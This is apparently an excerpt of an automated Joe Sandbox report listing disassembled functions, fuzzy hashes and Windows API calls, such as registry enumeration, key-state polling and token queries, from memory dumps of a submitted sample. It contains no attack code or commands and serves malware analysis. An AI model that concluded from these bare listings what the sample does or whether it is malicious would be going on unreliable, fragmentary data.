Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: da003bbb58630d70544f1b2ac2d960e15d113ab082e14fd013f6274a69543f88
Instruction ID: c4e0577177312a0bd9424c21b717a0a0f46268b5c1b0687a5012c6f3e53f3004
Opcode Fuzzy Hash: da003bbb58630d70544f1b2ac2d960e15d113ab082e14fd013f6274a69543f88
Instruction Fuzzy Hash: C88184716043019FD720EF68D986F6EB7E5AF48710F14891DFA99DB392EBB0AC408B51

Function 00B00697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B007E3
RegCloseKey.ADVAPI32(?,?), ref: 00B0080F
RegCloseKey.ADVAPI32(00000000), ref: 00B0081C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
Instruction ID: 23fd003b36390aed1366f480d901e21cb5e67fc74f68f9ba42044d8d3b6b5fb1
Opcode Fuzzy Hash: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
Instruction Fuzzy Hash: F7516A71218205AFC704EF64C981FAABBE9FF88304F40895DF596872A1EB30ED04CB52

Function 00AEEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AEEC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AEEC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AEECCA

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AEECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AEECF7

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: e788e2e38ed1f839617d95cc2a694d30a04f83ce509f6b495fbd113ff687b82e
Instruction ID: c7409af63e3bbe9d49ce873eea889a85985b085d50e0c1b81f6f58d0937a00af
Opcode Fuzzy Hash: e788e2e38ed1f839617d95cc2a694d30a04f83ce509f6b495fbd113ff687b82e
Instruction Fuzzy Hash: 45512A35A00119DFCB01EF65CA85EAEBBF5EF0D314B148099E809AB3A1DB31ED51DB90

Function 00B0A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
Instruction ID: c9f8ed7ade3041d236902078cc357ce16913d4d56c387c8605e2b8769ee2d179
Opcode Fuzzy Hash: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
Instruction Fuzzy Hash: F641D035904214AFD720DB28CC88FA9BFF8EB09310F5489A5F916A72D1CB70AD41DA91

Function 00A82714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A82727
ScreenToClient.USER32(00B477B0,?), ref: 00A82744
GetAsyncKeyState.USER32(00000001), ref: 00A82769
GetAsyncKeyState.USER32(00000002), ref: 00A82777

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
Instruction ID: c3b8855ecbb31b9226bc472da62046e87461ec0baf1d074ec6598700f89f1d89
Opcode Fuzzy Hash: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
Instruction Fuzzy Hash: EE416C75504119FFDF15AF69C844EE9BBB8BB05334F50835AF82896291CB30ADA0DB91

Function 00AD95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AD95E8
PostMessageW.USER32(?,00000201,00000001), ref: 00AD9692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AD969A
PostMessageW.USER32(?,00000202,00000000), ref: 00AD96A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AD96B0

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
Instruction ID: 45a5067ec412803f47c72d88cc31fb3ee7a4ddc4e4985759950be425b86cd93f
Opcode Fuzzy Hash: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
Instruction Fuzzy Hash: C931CC71900219EFDB14CF68D94CADE3BB5FB44315F10822AF926AB2D0C7B0D964DB90

Function 00ADBD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00ADBD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ADBDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ADBDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ADBE18
_wcsstr.LIBCMT ref: 00ADBE22

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 967a03194390b26f301a261087441322e175b86dd0c8b0b398593ea6255a4c04
Instruction ID: 80e2bfb6f9bdfd9b73446817e5a6e1cb1e2b8a410604e1a807ab1951c0507393
Opcode Fuzzy Hash: 967a03194390b26f301a261087441322e175b86dd0c8b0b398593ea6255a4c04
Instruction Fuzzy Hash: 8021F932614204FFEB255B399C49EBB7BADDF45760F11802AF90ADB291EF61DC509270

Function 00B0B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

GetWindowLongW.USER32(?,000000F0), ref: 00B0B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B0B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B0B841
GetSystemMetrics.USER32(00000004), ref: 00B0B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00AF155C,00000000), ref: 00B0B888

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
Instruction ID: 15d8e47e737ac5bf6d6f06e35c6651d1f90150b3a0963fe53618adcd74727aa8
Opcode Fuzzy Hash: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
Instruction Fuzzy Hash: 4D219131A24215AFCB149F398C48F6A3BE9FB05724F148769F921D72E0DB708950CB80

Function 00AF6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00AF6159
GetForegroundWindow.USER32 ref: 00AF6170
GetDC.USER32(00000000), ref: 00AF61AC
GetPixel.GDI32(00000000,?,00000003), ref: 00AF61B8
ReleaseDC.USER32(00000000,00000003), ref: 00AF61F3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
Instruction ID: 61ac99d6835c63bf98f6a379f3acdc7f6e51ae0effdf92858ed4999c46857449
Opcode Fuzzy Hash: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
Instruction Fuzzy Hash: 1E21A175A00204AFD700EFA5DD84AAABBF9EF88350F04C469F94AD7352CE74AC40CB90

Function 00A816CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
SelectObject.GDI32(?,00000000), ref: 00A81738
BeginPath.GDI32(?), ref: 00A8174F
SelectObject.GDI32(?,00000000), ref: 00A81778

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
Instruction ID: 1292f7c95c73068c30605fd8bd9a5d83a39e18ae59b0bba78c38f7fbfd67c380
Opcode Fuzzy Hash: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
Instruction Fuzzy Hash: 7F219034814208EBDB10EF6ADD48BA97BACF701321F14422AF855971A0DFB09A92CF90

Function 00ADC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00ADC84C
_memcmp.LIBCMT ref: 00ADC86A
_memcmp.LIBCMT ref: 00ADC87D
_memcmp.LIBCMT ref: 00ADC895
_memcmp.LIBCMT ref: 00ADC8AD

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
Instruction ID: d0674d4143885b1eddd32edde9c75990aa6cb869bba9b885f1077a10d6c13e7e
Opcode Fuzzy Hash: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
Instruction Fuzzy Hash: B401D272A442063BD60466109E82FEF73ACDA217A4F544126FE07D7382F760DE10E2E0

Function 00AE504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00AE5075
__beginthreadex.LIBCMT ref: 00AE5093
MessageBoxW.USER32(?,?,?,?), ref: 00AE50A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AE50BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AE50C5

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
Instruction ID: fe4d9d52615985c58f5758798b7e7dce99213db2d33d59035ccedc8d42a6b1a1
Opcode Fuzzy Hash: c6a2cb0eed69e96a026a3b0d38b9ddaecf5384b02095865fd477da0d6c36c0ba
Instruction Fuzzy Hash: DC110476D08748BFC7019FB9AC04ADB7BACAB46324F54425AF814D3390DBB58A408BF0

Function 00AD8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AD8E3C
GetLastError.KERNEL32(?,00AD8900,?,?,?), ref: 00AD8E46
GetProcessHeap.KERNEL32(00000008,?,?,00AD8900,?,?,?), ref: 00AD8E55
HeapAlloc.KERNEL32(00000000,?,00AD8900,?,?,?), ref: 00AD8E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AD8E73

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
Instruction ID: efe9a11bf997c7a3667697ca197377c1f19bf2796b40e7517968755a17df54ad
Opcode Fuzzy Hash: 06704c129d1e7eaac5c95fb70869784ac3f169f2bb16975f57dc945b15bbae1b
Instruction Fuzzy Hash: A8016D70210204BFDB205FA6DC48DAB7BBDEF89354B50452AF949C3220DE75DC50CA60

Function 00AE57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE5829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AE583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
Instruction ID: 1a40e382d76f2e35e9ed51b8f0c3915b46440a96824200de4e27cfc53be3f335
Opcode Fuzzy Hash: 2f167f80f43b134bc5990b19eca65732ec3b173171e86bb0cb6c8804d5459342
Instruction Fuzzy Hash: FB015731C11A1DABCF10AFFAE9489EDBBB8BB08715F408156E501F3140CF7495A0DBA1

Function 00AD8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
Instruction ID: f6845c93d7972d7bdf2fc598c844a2773ae8458352662076c0a488591aafad42
Opcode Fuzzy Hash: 79b3bdafe52cf6bc47929c36813734b0a607ce1e4b1bf09adb4a3a6b1c214f29
Instruction Fuzzy Hash: CEF0AF34210208BFEB101FA59C8CFA73BADFF49754B508026F945C7290CEA49C80DB60

Function 00AD8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
Instruction ID: db4206b66ccf91c6b42a8bd6e4714224c97250ebdfd3de05708c114b171025f3
Opcode Fuzzy Hash: a3256045ca4e800a97ffc8310c5ff74408689f8eacbde0316978116946671790
Instruction Fuzzy Hash: F7F0AF30250204BFEB111FA5EC88FA73BADEF49754F444116F986C7290CFA49E80DB60

Function 00ADCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00ADCD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 00ADCDA7
MessageBeep.USER32(00000000), ref: 00ADCDBF
KillTimer.USER32(?,0000040A), ref: 00ADCDDB
EndDialog.USER32(?,00000001), ref: 00ADCDF5

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
Instruction ID: 7cbd0687e916d4092b9e6ea74033ee2909a34e935de60c39ffb6429d138cba55
Opcode Fuzzy Hash: ae627548d44444e2ec911ae4bfe943b679c1b76d50f6a7f650294681855bdf16
Instruction Fuzzy Hash: 4601A730510709ABEB206B10DD4EB967B79FB00711F40466AB5C3611D1DBF0A994CA90

Function 00A8178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00A8179B
StrokeAndFillPath.GDI32(?,?,00ABBBC9,00000000,?), ref: 00A817B7
SelectObject.GDI32(?,00000000), ref: 00A817CA
DeleteObject.GDI32 ref: 00A817DD
StrokePath.GDI32(?), ref: 00A817F8

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
